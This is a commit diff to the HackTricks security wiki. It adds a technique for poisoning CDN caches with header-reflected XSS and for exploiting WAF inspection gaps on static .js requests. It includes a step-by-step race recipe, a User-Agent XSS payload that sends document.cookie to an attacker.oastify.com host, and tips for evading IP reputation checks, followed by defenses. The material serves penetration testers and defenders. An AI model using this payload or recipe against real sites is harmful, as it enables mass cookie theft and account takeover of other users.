mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Add content from: How I found a 0-Click Account takeover in a public BBP and l...
This commit is contained in:
		
							parent
							
								
									13f2a46a65
								
							
						
					
					
						commit
						d6a776e9d0
					
				| @ -172,6 +172,44 @@ The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vul | |||||||
| 
 | 
 | ||||||
| Example usage: `wcvs -u example.com` | Example usage: `wcvs -u example.com` | ||||||
| 
 | 
 | ||||||
|  | ### Header-reflection XSS + CDN/WAF-assisted cache seeding (User-Agent, auto-cached .js) | ||||||
|  | 
 | ||||||
|  | This real-world pattern chains a header-based reflection primitive with CDN/WAF behavior to reliably poison the cached HTML served to other users: | ||||||
|  | 
 | ||||||
|  | - The main HTML reflected an untrusted request header (e.g., `User-Agent`) into executable context. | ||||||
|  | - The CDN stripped cache headers but an internal/origin cache existed. The CDN also auto-cached requests ending in static extensions (e.g., `.js`), while the WAF applied weaker content inspection to GETs for static assets. | ||||||
|  | - Request flow quirks allowed a request to a `.js` path to influence the cache key/variant used for the subsequent main HTML, enabling cross-user XSS via header reflection. | ||||||
|  | 
 | ||||||
|  | Practical recipe (observed across a popular CDN/WAF): | ||||||
|  | 
 | ||||||
|  | 1) From a clean IP (avoid prior reputation-based downgrades), set a malicious `User-Agent` via browser or Burp Proxy Match & Replace. | ||||||
|  | 2) In Burp Repeater, prepare a group of two requests and use "Send group in parallel" (single-packet mode works best): | ||||||
|  |    - First request: GET a `.js` resource path on the same origin while sending your malicious `User-Agent`. | ||||||
|  |    - Immediately after: GET the main page (`/`). | ||||||
|  | 3) The CDN/WAF routing race plus the auto-cached `.js` often seeds a poisoned cached HTML variant that is then served to other visitors sharing the same cache key conditions (e.g., same `Vary` dimensions like `User-Agent`). | ||||||
|  | 
 | ||||||
|  | Example header payload (to exfiltrate non-HttpOnly cookies): | ||||||
|  | 
 | ||||||
|  | ``` | ||||||
|  | User-Agent: Mo00ozilla/5.0</script><script>new Image().src='https://attacker.oastify.com?a='+document.cookie</script>" | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | Operational tips: | ||||||
|  | 
 | ||||||
|  | - Many CDNs hide cache headers; poisoning may appear only on multi-hour refresh cycles. Use multiple vantage IPs and throttle to avoid rate-limit or reputation triggers. | ||||||
|  | - Using an IP from the CDN's own cloud sometimes improves routing consistency. | ||||||
|  | - If a strict CSP is present, this still works if the reflection executes in main HTML context and CSP allows inline execution or is bypassed by context. | ||||||
|  | 
 | ||||||
|  | Impact: | ||||||
|  | 
 | ||||||
|  | - If session cookies aren’t `HttpOnly`, zero-click ATO is possible by mass-exfiltrating `document.cookie` from all users who are served the poisoned HTML. | ||||||
|  | 
 | ||||||
|  | Defenses: | ||||||
|  | 
 | ||||||
|  | - Stop reflecting request headers into HTML; strictly context-encode if unavoidable. Align CDN and origin cache policies and avoid varying on untrusted headers. | ||||||
|  | - Ensure WAF applies content inspection consistently to `.js` requests and static paths. | ||||||
|  | - Set `HttpOnly` (and `Secure`, `SameSite`) on session cookies. | ||||||
|  | 
 | ||||||
| ## Vulnerable Examples | ## Vulnerable Examples | ||||||
| 
 | 
 | ||||||
| ### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577)) | ### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577)) | ||||||
| @ -245,9 +283,8 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S | |||||||
| - [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/) | - [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/) | ||||||
| - [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9) | - [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9) | ||||||
| - [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/) | - [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/) | ||||||
|  | - [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/) | ||||||
|  | - [Burp Proxy Match & Replace](https://portswigger.net/burp/documentation/desktop/tools/proxy/match-and-replace) | ||||||
| 
 | 
 | ||||||
| 
 | 
 | ||||||
| {{#include ../../banners/hacktricks-training.md}} | {{#include ../../banners/hacktricks-training.md}} | ||||||
| 
 |  | ||||||
| 
 |  | ||||||
| 
 |  | ||||||
|  | |||||||
| @ -131,7 +131,24 @@ By default, the WAF inspects only the first 8KB of a request. It can increase th | |||||||
| 
 | 
 | ||||||
| Up to 128KB. | Up to 128KB. | ||||||
| 
 | 
 | ||||||
| ### Obfuscation <a href="#obfuscation" id="obfuscation"></a> | ### Static assets inspection gaps (.js GETs) | ||||||
|  | 
 | ||||||
|  | Some CDN/WAF stacks apply weak or no content inspection to GET requests for static assets (for example paths ending with `.js`), while still applying global rules like rate limiting and IP reputation. Combined with auto-caching of static extensions, this can be abused to deliver or seed malicious variants that affect subsequent HTML responses. | ||||||
|  | 
 | ||||||
|  | Practical use cases: | ||||||
|  | 
 | ||||||
|  | - Send payloads in untrusted headers (e.g., `User-Agent`) on a GET to a `.js` path to avoid content inspection, then immediately request the main HTML to influence the cached variant. | ||||||
|  | - Use a fresh/clean IP; once an IP is flagged, routing changes can make the technique unreliable. | ||||||
|  | - In Burp Repeater, use "Send group in parallel" (single-packet style) to race the two requests (`.js` then HTML) through the same front-end path. | ||||||
|  | 
 | ||||||
|  | This pairs well with header-reflection cache poisoning. See: | ||||||
|  | 
 | ||||||
|  | - {{#ref}} | ||||||
|  | cache-deception/README.md | ||||||
|  | {{#endref}} | ||||||
|  | - [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/) | ||||||
|  | 
 | ||||||
|  | ### Obfuscation <a href="#ip-rotation" id="ip-rotation"></a> | ||||||
| 
 | 
 | ||||||
| ```bash | ```bash | ||||||
| # IIS, ASP Clasic | # IIS, ASP Clasic | ||||||
| @ -223,9 +240,7 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri | |||||||
| - [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) | - [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) | ||||||
| - [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g) | - [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g) | ||||||
| - [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization) | - [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization) | ||||||
|  | - [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/) | ||||||
| 
 | 
 | ||||||
| 
 | 
 | ||||||
| {{#include ../banners/hacktricks-training.md}} | {{#include ../banners/hacktricks-training.md}} | ||||||
| 
 |  | ||||||
| 
 |  | ||||||
| 
 |  | ||||||
|  | |||||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user